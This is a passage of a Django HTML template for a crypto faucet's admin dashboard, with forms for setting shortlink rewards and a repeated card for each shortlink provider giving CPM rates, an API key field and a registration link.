{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">
    <title>{{seting.nama_faucet}}</title>
    <!-- Custom fonts for this template-->
    <link href="{% static "vendor/fontawesome-free/css/all.min.css"%}" rel="stylesheet" type="text/css">
    <link
        href="https://fonts.googleapis.com/css?family=Nunito:200,200i,300,300i,400,400i,600,600i,700,700i,800,800i,900,900i"
        rel="stylesheet">
    <!-- Custom styles for this template-->
    <link href="{% static "css/sb-admin-2.min.css"%}" rel="stylesheet">
</head>
<body id="page-top">
    <!-- Page Wrapper -->
    <div id="wrapper">
        <!-- Sidebar -->
        <ul class="navbar-nav {{seting.warna_faucet}} sidebar sidebar-dark accordion" id="accordionSidebar">
            <!-- Sidebar - Brand -->
      <a class="sidebar-brand d-flex align-items-center justify-content-center" href="/admin">
          <div class="sidebar-brand-icon">
            <img height="50" src="{{seting.logo}}" alt="Logo">
          </div>
          <div class="sidebar-brand-text mx-3">
              {{seting.nama_faucet}}          </div>
        </a>
            <!-- Divider -->
            <hr class="sidebar-divider my-0">
            <!-- Divider -->
            <hr class="sidebar-divider my-0">
            <!-- Nav Item - Dashboard -->
            <li class="nav-item">
                <a class="nav-link" href="/admin">
                    <i class="fas fa-fw fa-tachometer-alt"></i>
                    <span>Dashboard</span></a>
        </li>
            <!-- Divider -->
            <!-- Divider -->
            <hr class="sidebar-divider">

            <!-- Heading -->
            <div class="sidebar-heading">
                Setting User & Faucet
            </div>

            <!-- Nav Item - Pages Collapse Menu -->
            <li class="nav-item">
                <a class="nav-link collapsed" href="#" data-toggle="collapse" data-target="#collapseTwo"
                    aria-expanded="true" aria-controls="collapseTwo">
                    <i class="fas fa-fw fa-cog"></i>
                    <span>User</span>
                </a>
                <div id="collapseTwo" class="collapse" aria-labelledby="headingTwo" data-parent="#accordionSidebar">
                    <div class="bg-white py-2 collapse-inner rounded">
                        <h6 class="collapse-header">Setting User:</h6>
                        <a class="collapse-item" href="/admin/user_list">List User</a>
                        <a class="collapse-item" href="/admin/user_setting">Setting User</a>
                    </div>
                </div>
            </li>

            <!-- Nav Item - Utilities Collapse Menu -->
            <li class="nav-item active">
                <a class="nav-link collapsed" href="#" data-toggle="collapse" data-target="#collapseUtilities"
                    aria-expanded="true" aria-controls="collapseUtilities">
                    <i class="fas fa-fw fa-wrench"></i>
                    <span>Setting earning</span>
                </a>
                <div id="collapseUtilities" class="collapse" aria-labelledby="headingUtilities"
                    data-parent="#accordionSidebar">
                    <div class="bg-white py-2 collapse-inner rounded">
                        <h6 class="collapse-header">Setting Earning:</h6>
                        <a class="collapse-item" href="/admin/faucet">Faucet</a>
                        <a class="collapse-item" href="/admin/auto">Auto Faucet</a>
                        <a class="collapse-item" href="/admin/seting_shortlink">Shortlink</a>
                    </div>
                </div>
            </li>
        </ul>
        <!-- End of Sidebar -->
        <!-- Content Wrapper -->
        <div id="content-wrapper" class="d-flex flex-column">
            <!-- Main Content -->
            <div id="content">
                <!-- Topbar -->
                <nav class="navbar navbar-expand navbar-light bg-white topbar mb-4 static-top shadow">
                    <!-- Sidebar Toggle (Topbar) -->
                    <button id="sidebarToggleTop" class="btn btn-link d-md-none rounded-circle mr-3">
                        <i class="fa fa-bars"></i>
                    </button>
                    <!-- Topbar Search -->
                    <!-- Topbar Navbar -->
                    <ul class="navbar-nav ml-auto">
                        <!-- Nav Item - Search Dropdown (Visible Only XS) -->
                        <div class="topbar-divider d-none d-sm-block"></div>
                        <!-- Nav Item - User Information -->
                        <li class="nav-item dropdown no-arrow">
                            <a class="nav-link dropdown-toggle" href="#" id="userDropdown" role="button"
                                data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                                <span class="mr-2 d-none d-lg-inline text-gray-600 small">Admin</span>
                                <img class="img-profile rounded-circle"
                                    src="{% static "img/undraw_profile.svg"%}">
                            </a>
                            <!-- Dropdown - User Information -->
                            <div class="dropdown-menu dropdown-menu-right shadow animated--grow-in"
                                aria-labelledby="userDropdown">
                                <a class="dropdown-item" href="/logout" data-toggle="modal" data-target="#logoutModal">
                                    <i class="fas fa-sign-out-alt fa-sm fa-fw mr-2 text-gray-400"></i>
                                    Logout
                                </a>
                            </div>
                        </li>
                    </ul>
                </nav>
                <!-- End of Topbar -->
                <!-- Begin Page Content -->
                <div class="container-fluid">
                    <!-- Page Heading -->
                    <div class="d-sm-flex align-items-center justify-content-between mb-4">
                        <h1 class="h3 mb-0 text-gray-800">Dashboard</h1>
                    </div>
                    <!-- Content Row -->
                    <div class="row">
                        <!-- Earnings (Monthly) Card Example -->
                        <div class="col-xl-3 col-md-6 mb-4">
                            <div class="card border-left-primary shadow h-100 py-2">
                                <div class="card-body">
                                    <div class="row no-gutters align-items-center">
                                        <div class="col mr-2">
                                            <div class="text-xs font-weight-bold text-primary text-uppercase mb-1">
                                                Website Balance </div>
                                            <div class="h5 mb-0 font-weight-bold text-gray-800">{{balance}} {{seting.jenis_faucet}} </div>
                                        </div>
                                        <div class="col-auto">
                                            <i class="fas fa-dollar-sign fa-2x text-gray-300"></i>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <!-- Earnings (Monthly) Card Example -->
                        <div class="col-xl-3 col-md-6 mb-4">
                            <div class="card border-left-success shadow h-100 py-2">
                                <div class="card-body">
                                    <div class="row no-gutters align-items-center">
                                        <div class="col mr-2">
                                            <div class="text-xs font-weight-bold text-success text-uppercase mb-1">
                                                Total Withdrawal</div>
                                            <div class="h5 mb-0 font-weight-bold text-gray-800">{{seting.total_wd}} Tokens</div>
                                        </div>
                                        <div class="col-auto">
                                            <i class="fas fa-paper-plane fa-2x text-gray-300"></i>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                       
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">shortlink rewards</h6>
                                </div>
                                <div class="card-body">
                                {% if sukses == True %}
                                <div class="alert alert-success" role="alert">
                                Sukses Save
                                </div>
                                {% endif %}
                                {% if sukses == False %}
                                <div class="alert alert-danger" role="alert">
                                Looks like something's wrong
                                </div>
                                {% endif %}
                                    <p> Enter the number of tokens that will be obtained by the user every time he completes the task </p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">your shortlink rewards : {{seting.reward_shortlink}} Tokens</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="number"  name="short" required="" class="form-control" id="short"
                                                placeholder="enter reward shortlink...">
                                        </div>
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">shortlink energy reward</h6>
                                </div>
                                <div class="card-body">
                                {% if sukses == True %}
                                <div class="alert alert-success" role="alert">
                                Sukses Save
                                </div>
                                {% endif %}
                                {% if sukses == False %}
                                <div class="alert alert-danger" role="alert">
                                Looks like something's wrong
                                </div>
                                {% endif %}
                                    <p>Enter the amount of reward to be given</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">your reward energy : {{seting.reward_energi_shortlink}} energy</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="number" name="energy" required="" class="form-control" id="energy"
                                                placeholder="reward energy...">
                                        </div>
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary" href="https://short2url.in">Short2</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 5.50$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{short2url}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="Short2" required="" class="form-control" id="Short2"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://short2url.in/" target="_blank" class="btn btn-success">Register</a>
                                   {% if short2url == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='Short2_up' name='Short2_up' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Pvidly</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 5.00$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{pvidly}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="pvidly" required="" class="form-control" id="pvidly"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://pvidly.in/" target="_blank" class="btn btn-success">Register</a>
                                   {% if pvidly == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='pvidly' name='pvidly' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Earnow</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 5.00$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{earnow}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="earnow" required="" class="form-control" id="earnow"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://earnow.online/" target="_blank" class="btn btn-success">Register</a>
                                   {% if earnow == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='earnow' name='earnow' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Link2</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 5.00$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{link2}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="link2" required="" class="form-control" id="link2"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://cutt.ly/TLL3gbU" target="_blank" class="btn btn-success">Register</a>
                                   {% if link2 == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='link2_up' name='link2' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">ShortyEarn</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 4.70$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{shortyearn}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="shortyearn" required="" class="form-control" id="shortyearn"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://cutt.ly/RKvL6a0" target="_blank" class="btn btn-success">Register</a>
                                   {% if shortyearn == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='shortyearn_up' name='shortyearn_up' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">UpShrink</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 3.00$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{upshrink}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="upshrink" required="" class="form-control" id="upshrink"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://cutt.ly/pKv7slx" target="_blank" class="btn btn-success">Register</a>
                                   {% if upshrink == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='upshrink_up' name='upshrink_up' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Adshorti</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 3.00$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{adshorti}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="adshorti" required="" class="form-control" id="adshorti"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://cutt.ly/IKvL78u" target="_blank" class="btn btn-success">Register</a>
                                   {% if adshorti == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='adshorti_up' name='adshorti_up' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Egfly</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 3.00$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{egfly}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="egfly" required="" class="form-control" id="egfly"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://cutt.ly/HKvM2e6" target="_blank" class="btn btn-success">Register</a>
                                   {% if egfly == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='egfly_up' name='egfly_up' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Adlink</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 3.50$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{adlink}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="adlink" required="" class="form-control" id="adlink"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://cutt.ly/6KvMVMj" target="_blank" class="btn btn-success">Register</a>
                                   {% if adlink == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='adlink_up' name='adlink_up' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Cbshort</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 4.00$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{cbshort}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="cbshort" required="" class="form-control" id="cbshort"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://cutt.ly/BGI2P1C" target="_blank" class="btn btn-success">Register</a>
                                   {% if cbshort == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='cbshort_up' name='cbshort_up' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Link1s</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 3.20$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{link1s}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="link1s" required="" class="form-control" id="link1s"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://cutt.ly/4GI2Svz" target="_blank" class="btn btn-success">Register</a>
                                   {% if link1s == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='link1s' name='link1s' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Megaurl</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 3.00$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{megaurl}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="megaurl" required="" class="form-control" id="megaurl"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://cutt.ly/MGI2FZx" target="_blank" class="btn btn-success">Register</a>
                                   {% if megaurl == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='megaurl_up' name='megaurl_up' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Riadshot</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 3.00$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{riadshot}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="riadshot" required="" class="form-control" id="riadshot"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://cutt.ly/lGI9onu" target="_blank" class="btn btn-success">Register</a>
                                   {% if riadshot == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='riadshot_up' name='riadshot_up' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Linkszia</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 3.80$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{linkszia}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="linkszia" required="" class="form-control" id="linkszia"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://cutt.ly/iGI9avi" target="_blank" class="btn btn-success">Register</a>
                                   {% if linkszia == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='linkszia_up' name='linkszia_up' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Hrshort</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 3.80$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{hrshort}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="hrshort" required="" class="form-control" id="hrshort"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://cutt.ly/UGI9sQd" target="_blank" class="btn btn-success">Register</a>
                                   {% if hrshort == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                  {% else %}
                                    <button class="btn btn-success btn-icon-split" id='hrshort_up' name='hrshort_up' value='1'>
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Update</span>
                                    </button>
                                  {% endif %}
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Sh2rt</h6>
                                </div>
                                <div class="card-body">
                                    <p>CPM : 4.00$<p>
                                    <p>Payment : Payeer | PayPal & More available</p>
                                    <p>Count : 1 views per IP address</p>
                                    <p>Current status : Paying</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{sh2rt}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="sh2rt" required="" class="form-control" id="sh2rt"
                                                placeholder="Api Key...">
                                        </div>
                                     <a href="https://cutt.ly/6GI9d1i" target="_blank" class="btn btn-success">Register</a>
                                   {% if sh2rt == "None" %}
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
